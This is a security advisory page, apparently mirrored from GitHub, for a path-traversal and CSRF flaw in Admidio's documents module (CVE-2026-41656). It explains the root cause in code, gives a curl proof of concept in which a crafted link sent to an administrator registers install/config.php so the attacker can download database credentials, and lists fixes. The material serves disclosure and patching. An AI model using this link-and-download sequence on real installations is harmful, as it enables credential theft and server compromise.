GHSA-M9H6-8PQM-XRHF

Vulnerability from github – Published: 2026-04-29 21:42 – Updated: 2026-05-08 20:13
VLAI?
Summary
Admidio has Path Traversal via Unvalidated `name` Parameter in Document Add Mode that Enables Arbitrary Server File Read
Details

Summary

The add mode in modules/documents-files.php accepts a name parameter validated only as 'string' type (HTML encoding), allowing path traversal characters (../) to pass through unfiltered. Combined with the absence of CSRF protection on this endpoint and SameSite=Lax session cookies, a low-privileged attacker can trick a documents administrator into clicking a crafted link that registers an arbitrary server file (e.g., install/config.php containing database credentials) into a documents folder accessible to the attacker.

Details

Root cause — incorrect input validation type (modules/documents-files.php:222):

case 'add':
    $getName = admFuncVariableIsValid($_GET, 'name', 'string');

The 'string' type in admFuncVariableIsValid() only applies SecurityUtils::encodeHTML(StringUtils::strStripTags($value)) (system/bootstrap/function.php:414-416). Since ../ contains no HTML special characters (<, >, &, ", '), path traversal sequences pass through unchanged.

The correct type would be 'file', which calls StringUtils::strIsValidFileName() (src/Infrastructure/Utils/StringUtils.php:217-236). This function checks basename($filename) !== $filename at line 228, which would reject any path containing directory separators.

Missing CSRF protection (modules/documents-files.php:221-238):

case 'add':
    $getName = admFuncVariableIsValid($_GET, 'name', 'string');

    if (!$gCurrentUser->isAdministratorDocumentsFiles()) {
        throw new Exception('SYS_NO_RIGHTS');
    }

    $folder = new Folder($gDb);
    $folder->readDataByUuid($getFolderUUID);
    $folder->addFolderOrFileToDatabase($getName);
    // ...

No SecurityUtils::validateCsrfToken() or form object validation. Compare with folder_delete (line 140) and file_delete (line 170) which both validate CSRF tokens. The add action operates entirely via GET parameters.

Unsafe path construction (src/Documents/Entity/Folder.php:121-135):

public function addFolderOrFileToDatabase(string $newFolderFileName): void
{
    $newFolderFileName = urldecode($newFolderFileName);
    $newObjectPath = $this->getFullFolderPath() . '/' . $newFolderFileName;
    // ...
    if (is_file($newObjectPath)) {
        $newFile = new File($this->db);
        $newFile->setValue('fil_fol_id', $folderId);
        $newFile->setValue('fil_name', $newFolderFileName);  // traversal stored in DB
        // ...
        $newFile->save();
    }
}

No realpath() comparison or basename() check. The traversal filename (e.g., ../../../install/config.php) is stored verbatim as fil_name in the database.

File served on download (src/Documents/Entity/File.php:88-91, src/Documents/Service/DocumentsService.php:68-119):

// File.php:88-91
public function getFullFilePath(): string
{
    return $this->getFullFolderPath() . '/' . $this->getValue('fil_name', 'database');
}

// DocumentsService.php:75-118
$completePath = $file->getFullFilePath();  // reconstructs traversal path
// ...
readfile($completePath);  // serves arbitrary file

SameSite=Lax allows cross-site GET (src/Session/Entity/Session.php:544):

'samesite' => 'lax'

Top-level GET navigations from cross-site origins include the session cookie, enabling the CSRF attack vector.

PoC

Prerequisites: Attacker has a regular user account with access to the documents module. A documents administrator is available to be social-engineered.

# Step 1: As regular user, browse the documents module to obtain a public folder UUID
curl -b 'attacker_session' 'https://target.com/modules/documents-files.php?mode=list'
# Note a folder_uuid from the response, e.g., "550e8400-e29b-41d4-a716-446655440000"

# Step 2: Craft a link targeting install/config.php (adjust ../ depth for folder nesting)
# For a folder at adm_my_files/documents/Photos/, use three levels:
PAYLOAD_URL='https://target.com/modules/documents-files.php?mode=add&folder_uuid=550e8400-e29b-41d4-a716-446655440000&name=../../../install/config.php'

# Step 3: Send this link to a documents administrator (email, chat, etc.)
# When the admin clicks it, the server's install/config.php is registered in the Photos folder
# The admin sees a redirect back to the documents page (normal behavior)

# Step 4: As attacker, list the folder to find the new file entry
curl -b 'attacker_session' 'https://target.com/modules/documents-files.php?mode=list&folder_uuid=550e8400-e29b-41d4-a716-446655440000'
# The traversal file appears in the listing with its file_uuid

# Step 5: Download the file using its UUID
curl -b 'attacker_session' 'https://target.com/modules/documents-files.php?mode=download&file_uuid=<FILE_UUID>'
# Response contains the contents of install/config.php, including:
# $g_adm_srv  (database host)
# $g_adm_usr  (database username)
# $g_adm_pw   (database password)
# $g_adm_db   (database name)

Impact

  • Arbitrary server file read: An attacker can read any file on the server that the web server process has read access to, including install/config.php (database credentials), /etc/passwd, application source code, and other configuration files.
  • Database credential exposure: The primary target install/config.php contains plaintext database credentials, enabling direct database access and full compromise of the Admidio installation.
  • Low attack complexity: The CSRF vector requires only that an admin clicks a single link — no JavaScript, no form submission, no special browser behavior.

Recommended Fix

Fix 1 — Use 'file' validation type for the name parameter (modules/documents-files.php:222):

// Before (vulnerable):
$getName = admFuncVariableIsValid($_GET, 'name', 'string');

// After (fixed):
$getName = admFuncVariableIsValid($_GET, 'name', 'file');

This invokes StringUtils::strIsValidFileName() which checks basename($filename) !== $filename and rejects any path containing directory traversal.

Fix 2 — Add CSRF protection to the add mode (modules/documents-files.php:221-238):

Change the add action from GET to POST and add CSRF token validation:

case 'add':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $getName = admFuncVariableIsValid($_POST, 'name', 'file');

    if (!$gCurrentUser->isAdministratorDocumentsFiles()) {
        throw new Exception('SYS_NO_RIGHTS');
    }

    $folder = new Folder($gDb);
    $folder->readDataByUuid($getFolderUUID);
    $folder->addFolderOrFileToDatabase($getName);
    // ...

Fix 3 (defense in depth) — Add path canonicalization in addFolderOrFileToDatabase() (src/Documents/Entity/Folder.php):

public function addFolderOrFileToDatabase(string $newFolderFileName): void
{
    $newFolderFileName = urldecode($newFolderFileName);
    $newObjectPath = $this->getFullFolderPath() . '/' . $newFolderFileName;

    // Ensure the resolved path is within the folder directory
    $realPath = realpath($newObjectPath);
    $folderPath = realpath($this->getFullFolderPath());
    if ($realPath === false || !str_starts_with($realPath, $folderPath . '/')) {
        throw new Exception('SYS_FILENAME_INVALID');
    }
    // ... rest of method
}

All three fixes should be applied for defense in depth.

Severity ?
4.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.8"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "admidio/admidio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.0.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41656"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T21:42:20Z",
    "nvd_published_at": "2026-05-07T04:16:28Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `add` mode in `modules/documents-files.php` accepts a `name` parameter validated only as `\u0027string\u0027` type (HTML encoding), allowing path traversal characters (`../`) to pass through unfiltered. Combined with the absence of CSRF protection on this endpoint and `SameSite=Lax` session cookies, a low-privileged attacker can trick a documents administrator into clicking a crafted link that registers an arbitrary server file (e.g., `install/config.php` containing database credentials) into a documents folder accessible to the attacker.\n\n## Details\n\n**Root cause \u2014 incorrect input validation type (modules/documents-files.php:222):**\n\n```php\ncase \u0027add\u0027:\n    $getName = admFuncVariableIsValid($_GET, \u0027name\u0027, \u0027string\u0027);\n```\n\nThe `\u0027string\u0027` type in `admFuncVariableIsValid()` only applies `SecurityUtils::encodeHTML(StringUtils::strStripTags($value))` (system/bootstrap/function.php:414-416). Since `../` contains no HTML special characters (`\u003c`, `\u003e`, `\u0026`, `\"`, `\u0027`), path traversal sequences pass through unchanged.\n\nThe correct type would be `\u0027file\u0027`, which calls `StringUtils::strIsValidFileName()` (src/Infrastructure/Utils/StringUtils.php:217-236). This function checks `basename($filename) !== $filename` at line 228, which would reject any path containing directory separators.\n\n**Missing CSRF protection (modules/documents-files.php:221-238):**\n\n```php\ncase \u0027add\u0027:\n    $getName = admFuncVariableIsValid($_GET, \u0027name\u0027, \u0027string\u0027);\n\n    if (!$gCurrentUser-\u003eisAdministratorDocumentsFiles()) {\n        throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n    }\n\n    $folder = new Folder($gDb);\n    $folder-\u003ereadDataByUuid($getFolderUUID);\n    $folder-\u003eaddFolderOrFileToDatabase($getName);\n    // ...\n```\n\nNo `SecurityUtils::validateCsrfToken()` or form object validation. Compare with `folder_delete` (line 140) and `file_delete` (line 170) which both validate CSRF tokens. The `add` action operates entirely via GET parameters.\n\n**Unsafe path construction (src/Documents/Entity/Folder.php:121-135):**\n\n```php\npublic function addFolderOrFileToDatabase(string $newFolderFileName): void\n{\n    $newFolderFileName = urldecode($newFolderFileName);\n    $newObjectPath = $this-\u003egetFullFolderPath() . \u0027/\u0027 . $newFolderFileName;\n    // ...\n    if (is_file($newObjectPath)) {\n        $newFile = new File($this-\u003edb);\n        $newFile-\u003esetValue(\u0027fil_fol_id\u0027, $folderId);\n        $newFile-\u003esetValue(\u0027fil_name\u0027, $newFolderFileName);  // traversal stored in DB\n        // ...\n        $newFile-\u003esave();\n    }\n}\n```\n\nNo `realpath()` comparison or `basename()` check. The traversal filename (e.g., `../../../install/config.php`) is stored verbatim as `fil_name` in the database.\n\n**File served on download (src/Documents/Entity/File.php:88-91, src/Documents/Service/DocumentsService.php:68-119):**\n\n```php\n// File.php:88-91\npublic function getFullFilePath(): string\n{\n    return $this-\u003egetFullFolderPath() . \u0027/\u0027 . $this-\u003egetValue(\u0027fil_name\u0027, \u0027database\u0027);\n}\n\n// DocumentsService.php:75-118\n$completePath = $file-\u003egetFullFilePath();  // reconstructs traversal path\n// ...\nreadfile($completePath);  // serves arbitrary file\n```\n\n**SameSite=Lax allows cross-site GET (src/Session/Entity/Session.php:544):**\n\n```php\n\u0027samesite\u0027 =\u003e \u0027lax\u0027\n```\n\nTop-level GET navigations from cross-site origins include the session cookie, enabling the CSRF attack vector.\n\n## PoC\n\n**Prerequisites:** Attacker has a regular user account with access to the documents module. A documents administrator is available to be social-engineered.\n\n```bash\n# Step 1: As regular user, browse the documents module to obtain a public folder UUID\ncurl -b \u0027attacker_session\u0027 \u0027https://target.com/modules/documents-files.php?mode=list\u0027\n# Note a folder_uuid from the response, e.g., \"550e8400-e29b-41d4-a716-446655440000\"\n\n# Step 2: Craft a link targeting install/config.php (adjust ../ depth for folder nesting)\n# For a folder at adm_my_files/documents/Photos/, use three levels:\nPAYLOAD_URL=\u0027https://target.com/modules/documents-files.php?mode=add\u0026folder_uuid=550e8400-e29b-41d4-a716-446655440000\u0026name=../../../install/config.php\u0027\n\n# Step 3: Send this link to a documents administrator (email, chat, etc.)\n# When the admin clicks it, the server\u0027s install/config.php is registered in the Photos folder\n# The admin sees a redirect back to the documents page (normal behavior)\n\n# Step 4: As attacker, list the folder to find the new file entry\ncurl -b \u0027attacker_session\u0027 \u0027https://target.com/modules/documents-files.php?mode=list\u0026folder_uuid=550e8400-e29b-41d4-a716-446655440000\u0027\n# The traversal file appears in the listing with its file_uuid\n\n# Step 5: Download the file using its UUID\ncurl -b \u0027attacker_session\u0027 \u0027https://target.com/modules/documents-files.php?mode=download\u0026file_uuid=\u003cFILE_UUID\u003e\u0027\n# Response contains the contents of install/config.php, including:\n# $g_adm_srv  (database host)\n# $g_adm_usr  (database username)\n# $g_adm_pw   (database password)\n# $g_adm_db   (database name)\n```\n\n## Impact\n\n- **Arbitrary server file read**: An attacker can read any file on the server that the web server process has read access to, including `install/config.php` (database credentials), `/etc/passwd`, application source code, and other configuration files.\n- **Database credential exposure**: The primary target `install/config.php` contains plaintext database credentials, enabling direct database access and full compromise of the Admidio installation.\n- **Low attack complexity**: The CSRF vector requires only that an admin clicks a single link \u2014 no JavaScript, no form submission, no special browser behavior.\n\n## Recommended Fix\n\n**Fix 1 \u2014 Use `\u0027file\u0027` validation type for the `name` parameter (modules/documents-files.php:222):**\n\n```php\n// Before (vulnerable):\n$getName = admFuncVariableIsValid($_GET, \u0027name\u0027, \u0027string\u0027);\n\n// After (fixed):\n$getName = admFuncVariableIsValid($_GET, \u0027name\u0027, \u0027file\u0027);\n```\n\nThis invokes `StringUtils::strIsValidFileName()` which checks `basename($filename) !== $filename` and rejects any path containing directory traversal.\n\n**Fix 2 \u2014 Add CSRF protection to the `add` mode (modules/documents-files.php:221-238):**\n\nChange the `add` action from GET to POST and add CSRF token validation:\n\n```php\ncase \u0027add\u0027:\n    SecurityUtils::validateCsrfToken($_POST[\u0027adm_csrf_token\u0027]);\n    $getName = admFuncVariableIsValid($_POST, \u0027name\u0027, \u0027file\u0027);\n\n    if (!$gCurrentUser-\u003eisAdministratorDocumentsFiles()) {\n        throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n    }\n\n    $folder = new Folder($gDb);\n    $folder-\u003ereadDataByUuid($getFolderUUID);\n    $folder-\u003eaddFolderOrFileToDatabase($getName);\n    // ...\n```\n\n**Fix 3 (defense in depth) \u2014 Add path canonicalization in `addFolderOrFileToDatabase()` (src/Documents/Entity/Folder.php):**\n\n```php\npublic function addFolderOrFileToDatabase(string $newFolderFileName): void\n{\n    $newFolderFileName = urldecode($newFolderFileName);\n    $newObjectPath = $this-\u003egetFullFolderPath() . \u0027/\u0027 . $newFolderFileName;\n\n    // Ensure the resolved path is within the folder directory\n    $realPath = realpath($newObjectPath);\n    $folderPath = realpath($this-\u003egetFullFolderPath());\n    if ($realPath === false || !str_starts_with($realPath, $folderPath . \u0027/\u0027)) {\n        throw new Exception(\u0027SYS_FILENAME_INVALID\u0027);\n    }\n    // ... rest of method\n}\n```\n\nAll three fixes should be applied for defense in depth.",
  "id": "GHSA-m9h6-8pqm-xrhf",
  "modified": "2026-05-08T20:13:41Z",
  "published": "2026-04-29T21:42:20Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-m9h6-8pqm-xrhf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41656"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Admidio/admidio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Admidio has Path Traversal via Unvalidated `name` Parameter in Document Add Mode that Enables Arbitrary Server File Read"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.